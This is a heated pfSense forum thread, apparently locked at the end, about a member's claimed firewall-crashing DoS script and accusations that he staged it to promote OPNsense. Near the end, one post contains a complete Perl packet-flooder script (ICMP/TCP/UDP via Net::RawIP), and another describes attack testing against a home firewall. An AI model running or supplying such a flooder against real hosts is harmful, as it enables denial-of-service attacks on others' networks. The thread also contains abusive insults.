What is the biggest attack in GBPS you stopped
-
Thing is Chris.
You accused of downing pfsense/ESF and the forum.
How was it downed and did you do a pcap?
Fact is that it was downed according to you. Why not try and use that pcap and see what was causing it?
I experienced problems one afternoon trying to get on the forum and even reported it, I dont know who or what was behind it, but I can speculate until the cows come home. :D
I then had a hell of job trying different ways to get to the forum, like using proxys based in different parts of Europe.
The proxy based in another country generally was successful at accessing the forum, until I tried to log in, read that as having identified myself, at which point connections were dropped.
I never had a problem at accessing the pfsense website on the different IP address at the same time, in fact it was plain sailling so to speak all along the various ESF IP addresses, but once I displayed a repeatable pattern when accessing the forum thats when access was blocked. Things is, AI is a quick learner.
-
The forum has occasional problems. They feel like database issues to me.
-
The forum has occasional problems. They feel like database issues to me.
Thats one way of putting it.
-
This shit still going on? Supermule, which part of the post I linked you do not get? Absolutely NOONE is interested in YT videos, PM to get (D)DoS-ed and similar bullcrap! Want it being worked on and fixed? Provide the information required! Instead of stupid excuses why not to do so…
-
:D
I didnt work with Franco UNTIL after we didnt get anywhere with pfsense and he is NOT behind this.
After we tried to get ESF involved and push for testing at a rig in their control then they could put the collectad data upstream. But nothing.
I tested Opnsense as a measure to see if it was all systems based on FreeBSD thats vulnerable and that was the way I got in touch with Franco.
I asked him politely if he wanted to help me test and get it upstream and he would.
So pls. dont make assumptions in your own head. It has nothing to do with the real world scenario.
Yea, nice try but I'm not buying it. This thread and the ones on FreeBSD forums prove the opposite. Your plan was to make pfSense look vulnerable to the phantom issue and present opnsense as a better solution.
I'm also beginning to think that this "trick" you refused to share with anyone is actually Franco's idea in the first place, considering his packetwerk background.
Feel free to continue to deny it, keep saying that poor you just tried to help but nobody gave you a chance, but we all know that opnsense promotion was behind all this time. Now it makes sense why you behaved like this, why you refused to share any useful details on the issue. Now it shows how truly corrupt and malicious opnsense people and their drones like you really are.
Thanks once again for proving me right.
-
Why didn't you provide the FreeBSD security team the details of your alleged vulnerability?
crickets
-
I dont ask you to buy it. I am just beeing honest.
Picture is from opnsense forum messages.
Conversation beginning at June 9th. As of june 22nd we havent gotten around to test and Franco is in the dark as well and havent been able to get any info. 4 PM's preceeding this picture.
Did the attacks occur before june 9th?? If it did, then its not related to Opnsense as stated and they have nothing to do with it.
So try again. And lose the tinfoil suit your wearing.
EDIT: AS you can see I registered June 6th. Was that before or after the attacks??
If after then you look stupid in many peoples views. Including mine.
If it was Franco then why would he need to test things in the 1st place?? If he had the script.
-
The problem has shifted into how transparent are people posting on this forum.
From a pfsense/ESF perspective, this isnt good for business, because even the mention of other solutions can be good/bad for business as it raises awareness of others which undermines marketing.
Whilst theres no denying no one can do anything about bandwidth domination, aka flooding, (D)Dos, how a security product handles it does matter if and when it falls over. Hopefully pfsense/ESF can come up with a solution, perhaps better education of their product to their users which might be lucractive or at least damage limitation.
Either way I've learnt more from this thread and seeing things on my own system which is always educational.
-
I dont ask you to buy it. I am just beeing honest.
Picture is from opnsense forum messages.
Conversation beginning at June 9th. As of june 22nd we havent gotten around to test and Franco is in the dark as well and havent been able to get any info. 4 PM's preceeding this picture.
Did the attacks occur before june 9th?? If it did, then its not related to Opnsense as stated and they have nothing to do with it.
So try again. And lose the tinfoil suit your wearing.
EDIT: AS you can see I registered June 6th. Was that before or after the attacks??
If after then you look stupid in many peoples views. Including mine.
If it was Franco then why would he need to test things in the 1st place?? If he had the script.
Ha! You're making 0 sense, you know that, right? You think it matters when you registered on opnsense forum? Dude, you must think everyone here is stupid.
No, that does not make you right. There's still proof right here that you ignored all requests for more information from both pfSense guys and FreeBSD team. That means you intentionally created this charade for self-promotion of yourself and your patrons, opnsense (whom you "gave" a fix for the issue).
Opnsense is known for their lies and maliscious behaviour from day 1 since their inception, so your denial and refusal to provide any kind of information except those worthless youtube videos speaks volumes.
You had a chance and you blew it, give it up. Go sell opnsense somewhere else.
I just love the way you're being nervous because you got busted! Say hi to Franco!
-
-
This thread requires moderation please. It was an interesting read, but is going nowhere…
-
What??
:D
Geesus.
I let people decide whats right and whats not. We have emails dating back about 6mths asking pfsense/ESF for advise and asking them for help. Almost nothing came back.
Ask yourself if you would provide a script to strangers that can down almost anything with 3mb/s traffic and wait for a fix.
Its like providing guns to the youth of America and trusting them not to use it…. just to provide information to the producers of whether the damn thing could kill people or not.
You keep bickering about Opnsense.
I think everyone has seen that this is not about Opnsense and me since we are not related in any way.
I didnt provide a fix to Franco. He did that by himself when I posted the security advise from FreeBSD.
So pls. stop since you look like a fool IMHO.
Lets look at it differently:
When you get attacked, you call the person responsible and ask for his code?
Or do you log and see whats coming and how the box behaves?
You are forced to do chose the 2nd option since you have no control over whats coming your way.
So providing the code has no relevance at all. Providing the test rig and do Dtrace and DEV work is the way ahead.
Come on guys....
I know you can do better than that, but youre cornered and have no way out.
Just admit you handled it badly and we can get on with it. Nothing more in it.
-
No I did not. Where do you see that??
Why didn't you provide the FreeBSD security team the details of your alleged vulnerability?
crickets
Interestingly he did provide the details to opnsense, which was part of the plan since the beginning of this charade. He's so busted ;D
-
Ask yourself if you would provide a script to strangers that can down almost anything with 3mb/s traffic and wait for a fix.
So, by strangers you mean the FreeBSD security team, e.g.?
Hey guys, your firewall suxxx, I can take it down in no time.
Hmm, interesting claim. How do you do that?
Look at this YT video.
Hmm, there is no useful information in there. We need a way to reproduce it.
I have the script.
So give it to us so that we can investigate and fix it.
No way, too dangerous.
So report this to the security team and provide it to them privately.
No, it's not a security issue.
Stop wasting our time.Just admit you handled it badly and we can get on with it. Nothing more in it.
Yeah, you handled it like a total idiot. I linked you to the doc on reporting security issues to BSD many many months ago. You did nothing. Then you went to FreeBSD forums, and attempted to run similar idiotic YT channel there, and were quickly told to GTFO with such crap. (Kudos to FBSD guys…) Now, you keep moaning that pfSense/FBSD is vulnerable, but when told to report the vulnerability, properly, you say it's not a security issue. WTF is this retarded game about?
Someone lock this retarded thread already, please.
-
I have replaced firewall with nuclear weapons…
So, by strangers you mean the National security team, e.g.?
Hey guys, your COUNTRY suxxx, I can take it down in no time.
Hmm, interesting claim. How do you do that?
Look at this YT video. (NUCLEAR BOMB)
Hmm, there is no useful information in there. We need a way to reproduce it.
I have the BOMB.
So give it to us so that we can investigate and fix it.
No way, too dangerous.
So report this to the security team and provide it to them privately.
No, it's not a security issue.
Stop wasting our time.
BOOMMM :DOR:
So, by strangers you mean the FreeBSD security team, e.g.?
Hey guys, your firewall has issues, I can take it down in no time.
Hmm, interesting claim. How do you do that?
Look at this YT video. (almost 20 videos)
Hmm, there is no useful information in there. We need a way to reproduce it.
I have the script.
We will set up a test rig you can attack and we will log what we need to get to the bottom of this.
Great. What time suits you best??
We need a few days to set ip up and get it running. Will let you know. How do we get in touch?
Write me a PM here on the forum or send me an email.
Thanks. Talk later.A roadmap has been made and tests will commence. Thats the way Franco suggested and thats the right way of doing it since I have allready stated I am not allowed to share the script.
End of discussion.
Ask yourself if you would provide a script to strangers that can down almost anything with 3mb/s traffic and wait for a fix.
So, by strangers you mean the FreeBSD security team, e.g.?
Hey guys, your firewall suxxx, I can take it down in no time.
Hmm, interesting claim. How do you do that?
Look at this YT video.
Hmm, there is no useful information in there. We need a way to reproduce it.
I have the script.
So give it to us so that we can investigate and fix it.
No way, too dangerous.
So report this to the security team and provide it to them privately.
No, it's not a security issue.
Stop wasting our time.Just admit you handled it badly and we can get on with it. Nothing more in it.
Yeah, you handled it like a total idiot.
Someone lock this retarded thread already, please.
-
And more blaaaaaah blaaaaaaaaah blaaaaaaaaaaaah….
since I have allready stated I am not allowed to share the script.
By whom? The criminals your rented the botnet from? Would the license be more expensive? ::) ::) ::) ;D ;D ;D
-
Die thread die!
-
What??
:D
Geesus.
I let people decide whats right and whats not. We have emails dating back about 6mths asking pfsense/ESF for advise and asking them for help. Almost nothing came back.
Ask yourself if you would provide a script to strangers that can down almost anything with 3mb/s traffic and wait for a fix.
Its like providing guns to the youth of America and trusting them not to use it…. just to provide information to the producers of whether the damn thing could kill people or not.
You keep bickering about Opnsense.
I think everyone has seen that this is not about Opnsense and me since we are not related in any way.
I didnt provide a fix to Franco. He did that by himself when I posted the security advise from FreeBSD.
So pls. stop since you look like a fool IMHO.
Lets look at it differently:
When you get attacked, you call the person responsible and ask for his code?
Or do you log and see whats coming and how the box behaves?
You are forced to do chose the 2nd option since you have no control over whats coming your way.
So providing the code has no relevance at all. Providing the test rig and do Dtrace and DEV work is the way ahead.
Come on guys....
I know you can do better than that, but youre cornered and have no way out.
Just admit you handled it badly and we can get on with it. Nothing more in it.
Looks like the more facts I point out the longer and more pointless your replies get.
Let's go quickly trough the facts:
1. Yes you did provide fix to Franco or opnsense, as you've pointed it out multiple times in this thread https://forum.pfsense.org/index.php?topic=91856.msg539638#msg539638
2. You've been promoting opnsense on this thread from its start
3. You have failed to provide any context to your phantom DDOS and ignored any request for factual proof or more information
4. you have been called out multiple times by most of people here for not providing any information yet now all of the sudden opnsense has the fix because "franco is a nice guy"Oh you've also gone full nuts with claims like:
Ask yourself if you would provide a script to strangers that can down almost anything with 3mb/s traffic and wait for a fix.
Its like providing guns to the youth of America and trusting them not to use it…. just to provide information to the producers of whether the damn thing could kill people or not.
Just drop it, you've been busted. The harder you try, the more obvious it gets.
I know you can do better than that, but youre cornered and have no way out.
=https://en.wikipedia.org/wiki/Spin_%28public_relations%29
-
And more blaaaaaah blaaaaaaaaah blaaaaaaaaaaaah….
since I have allready stated I am not allowed to share the script.
By whom? The criminals your rented the botnet from? Would the license be more expensive? ::) ::) ::) ;D ;D ;D
But at the same time Franco from opnsense has it since they will be releasing a "fix" hahaha
-
Ashley Lorenzana actually said it well…
“It's okay to disagree with the thoughts or opinions expressed by other people. That doesn't give you the right to deny any sense they might make. Nor does it give you a right to accuse someone of poorly expressing their beliefs just because you don't like what they are saying. Learn to recognize good writing when you read it, even if it means overcoming your pride and opening your mind beyond what is comfortable.”
Friedrich Nietzsche carved it in stone "Convictions are more dangerous enemies of truth than lies."
W. G. McAdoo had it about right. This must be a trend among some. "It is impossible to defeat an ignorant man in an argument."
To finish this off with Calvin Coolidge. "Nothing in the world can take the place of persistence. Talent will not; nothing is more common than unsuccessful men with talent. Genius will not; un-rewarded genius is almost a proverb. Education will not; the world is full of educated derelicts. Persistence and determination alone are omnipotent. "
Make of it what you want.
EOD.
-
This is the sort of reply I'd expect from someone who's political views are being censored… Not a tech rant.
-
This is the sort of reply I'd expect from someone who's political views are being censored… Not a tech rant.
As is about 90% of this thread ::)
-
-
Ashley Lorenzana actually said it well…
Friedrich Nietzsche carved it in stone
W. G. McAdoo had it about right.
To finish this off with Calvin Coolidge -
This thread is a Textbook example… http://pastebin.com/irj4Fyd5
-
The funny shit is that most of the arguers of ESF has limited numbers of posts.
A lot of them has had their first post here.
And one even registered today to begin posting in this topic. I wonder why…..
-
The funny shit is that most of the arguers of ESF has limited numbers of posts.
A lot of them has had their first post here.
And one even registered today to begin posting in this topic. I wonder why…..
Yea, I registered because you're out of control. For those who are unaware, please check out my Twitter profile where most of the time I spend talking about opnsense scams like the ones Supermule attempted here.
https://twitter.com/htilonom
-
…like staring wide-eyed into the sun
-
Following htilonom on twitter back to the account start last year and the dislike for anonabox started me wondering, then I found this thread with htilonom posting on it.
https://www.reddit.com/r/PFSENSE/comments/35dl17/pfsense_vs_opnsense_articles/
Theres a definite pattern.
-
Ask yourself if you would provide a script to strangers that can down almost anything with 3mb/s traffic and wait for a fix.
Hmmm, and what kind of script you where showing them all here in the forum in this post then? ???
-
Not the one I was using but similar :)
-
Not the one I was using but similar :)
Ahh ok then this time here in this thread we are talking about another one, right?
-
Following htilonom on twitter back to the account start last year and the dislike for anonabox started me wondering, then I found this thread with htilonom posting on it.
https://www.reddit.com/r/PFSENSE/comments/35dl17/pfsense_vs_opnsense_articles/
Theres a definite pattern.
Can you elaborate? Not sure if you meant it in a good or a negative way…
-
Yes. That was just an example of how easy it is to get a script that can be used to annoy people.
@BlueKobold:
Not the one I was using but similar :)
Ahh ok then this time here in this thread we are talking about another one, right?
-
Ok it was only for my better understanding, why all peoples where talking to you, that you where not
be at the willing to show the script and in another thread it was perhaps able to read for everyone.
Thanks.Yes. That was just an example of how easy it is to get a script that can be used to annoy people.
-
#!/usr/bin/perl -w
=================================================
simple network flooder script
takes type of flood (icmp, tcp, udp) as param
optionally takes dest ip and packet count
=================================================
my $VERSION = 0.5;
=================================================
use strict;
use Net::RawIP;my $flood = shift or &usage();
my $dstip = shift || '127.0.0.1';
my $pktct = shift || 100;&icmpflood($dstip, $pktct) if $flood =~ 'icmp';
&tcpflood($dstip, $pktct) if $flood =~ 'tcp';
&udpflood($dstip, $pktct) if $flood =~ 'udp';sub icmpflood() {
my($dstip, $pktct, $code, $type, $frag);
$dstip = shift;
$pktct = shift;print "\nstarting flood to $dstip\n";
for(my $i=0; $i <= $pktct; $i++) {$code = int(rand(255));
$type = int(rand(255));
$frag = int(rand(2));my $packet = new Net::RawIP({
ip => {
daddr => $dstip,
frag_off => $frag,
},
icmp => {
code => $code,
type => $type,
}
});$packet->send;
print "sent icmp $type->$code, frag: $frag\n";
}
print "\nflood complete\n\n";
}sub tcpflood() {
my($dstip, $pktct, $sport, $dport, $frag, $urg, $psh, $rst, $fin,
$syn, $ack);
$dstip = shift;
$pktct = shift;
print "\nstarting flood to $dstip\n";
for(my $i=0; $i <= $pktct; $i++) {$sport = int(rand(65535));
$dport = int(rand(65535));
$frag = int(rand(2));
$urg = int(rand(2));
$psh = int(rand(2));
$rst = int(rand(2));
$fin = int(rand(2));
$syn = int(rand(2));
$ack = int(rand(2));my $packet = new Net::RawIP({
ip => {
daddr => $dstip,
frag_off => $frag,
},
tcp => {
source => $sport,
dest => $dport,
urg => $urg,
psh => $psh,
rst => $rst,
fin => $fin,
syn => $syn,
ack => $ack,
}
});$packet->send;
print "sent tcp packet from $sport to $dport, frag: $frag, psh:
$psh, rst: $rst, fin: $fin, syn: $syn, ack: $ack\n";
}
print "\nflood complete\n\n";
}sub udpflood() {
my($dstip, $pktct, $sport, $dport, $frag);
$dstip = shift;
$pktct = shift;print "\nstarting flood to $dstip\n";
for(my $i=0; $i <= $pktct; $i++) {$sport = int(rand(255));
$dport = int(rand(255));
$frag = int(rand(2));my $packet = new Net::RawIP({
ip => {
daddr => $dstip,
frag_off => $frag,
},
udp => {
source => $sport,
dest => $dport,
}
});$packet->send;
print "sent udp packet from $sport to $dport, frag: $frag\n";
}
print "\nflood complete\n\n";
}sub usage() {
print "
need to set a valid flood type (one of icmp, tcp, udp)
optionally set dest ip and packetcountexample:
$0 [tcp udp icmp] \n\n";
exit 0;
}A shared script. Page 21 in this thread as I've called SM out earlier on for not sharing the script, but saying that I didnt get taken down directly by the attacks but when I started to use some things in the gui namely RRD graph thats when the fw went unresponsive, my experiences are around pages June 2 (Pages 31-35 iirc).
You can stop it now for that ip address as I'm on another one.
I dont think it was pingable we could for the next test make it pingable but the problem with ADSL is its faster down than up so you may not get consistent pings back anyway.
When you say NAT'able what do you mean by that?
I tried a variety of different settings throughout, like trying to access ip addresses that were closer to me than the ip addresses coming in to port 80, swapped the firewall optimisation around from aggressive to normal to high latency (satellite links) whilst trying to get out but no joy at getting any webpages up throughout, the odd DNS request packet got out seen as a green icon in the dynamic fw log.
Interestingly it seemed to max out at 2.42Mbps yet various speed tests suggest I have a 5Mbps adsl connection. CPU was 100% through out.
FW stayed responsive throughout with snort running, changing various rules made some of the dashboard interface graphs stop updating second by second to maybe updating 10seconds later but I get that anyway when updating some rules or changing things in snort.
The only time I managed to kill the fw was trying to load the RRD graphs for All just a moment ago with the other fw webpages (dashboard, system activity, dynamic fw log) opened along with one or two other fw webpages open when changing rules etc, otherwise I'd have stayed on the old ip address for longer trying different things.
-
Franco was the only one willing to help get it upstream and the connection was made when I asked him politely.
Nothing more in it.
Brian, I won't tollerate hostility or lies. You stated at least two things that aren't true in this post.
You should retract what you've said that isn't true.
-
This topic is now locked.